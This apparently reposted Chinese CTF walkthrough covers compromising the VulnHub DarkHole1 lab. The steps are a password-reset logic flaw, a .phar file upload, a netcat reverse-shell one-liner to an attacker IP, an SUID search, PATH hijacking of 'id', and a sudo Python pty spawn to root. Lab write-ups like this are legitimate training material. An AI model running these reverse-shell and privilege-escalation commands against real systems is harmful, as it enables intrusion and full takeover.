DarkHole1

下载地址：https://download.vulnhub.com/darkhole/DarkHole.zip

攻击者IP：172.20.134.149 natvmare

受害者IP：172.20.134.142 nat wmare

参考：https://blog.csdn.net/MRS_jianai/article/details/128497960

https://blog.csdn.net/Perpetual_Blue/article/details/124265351

主机发现

端口扫描

目录扫描

http://172.20.134.142/login.php

注册一个账号后登录

登陆后的页面，可能存在sql或任意用户密码重置等逻辑漏洞

sql注入防护的很严实

重置一下id=1的密码，盲猜用户名是admin

admin/root

文件上传

参考：https://zh.wikipedia.org/wiki/PHAR_(%E6%96%87%E4%BB%B6%E6%A0%BC%E5%BC%8F)

https://websec.readthedocs.io/zh/latest/language/php/phar.html

https://www.php.net/manual/en/book.phar.php

phar（PHP Archive）文件是一种打包格式，将PHP代码文件和其他资源放入一个文件中来实现应用程序和库的分发。

在来自Secarma的安全研究员Sam Thomas在18年的Black Hat上提出后利用方式后，开始受到广泛的关注。

Phar可利用是因为Phar以序列化的形式存储用户自定义的meta-data，而以流的形式打开的时候，会自动反序列化，从而触发对应的攻击载荷。

或者使用phtml

PHTML文件扩展名通常与PHP脚本相关联，它允许在HTML文件中嵌入PHP代码。

https://stackoverflow.com/questions/11859015/what-is-phtml-and-when-should-i-use-a-phtml-extension-rather-than-php

将php改成phar上传

蚁剑反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 172.20.134.129 1111 >/tmp/f

反弹成功

查找suid权限

find / -user root -perm -4000 -print 2>/dev/null

发现

/home/john/toto

执行后是john用户执行了id命令

命令劫持

cd /tmp# 切换到/tmp 目录echo "/bin/bash" > id# 将命令写入文件 id 中chmod +x id# 修改文件权限，增加执行权限export PATH=/tmp:$PATH # 添加/tmp 目录到 PATH 变量中which id# 查看 id 命令的路径

执行toto

方法1

发现用户darkhole的密码，直接修改root密码，切换root

方法2：

root123同时也是john的密码

sudo -l

发现john可以以root的身份执行file这个python文件：

在file.py里面写一段打开shell的代码，再以root的身份执行

echo "import pty;pty.spawn('/bin/bash')" > file.pysudo python3 /home/john/file.py

原文始发于微信公众号（王之暴龙战神）：DarkHole1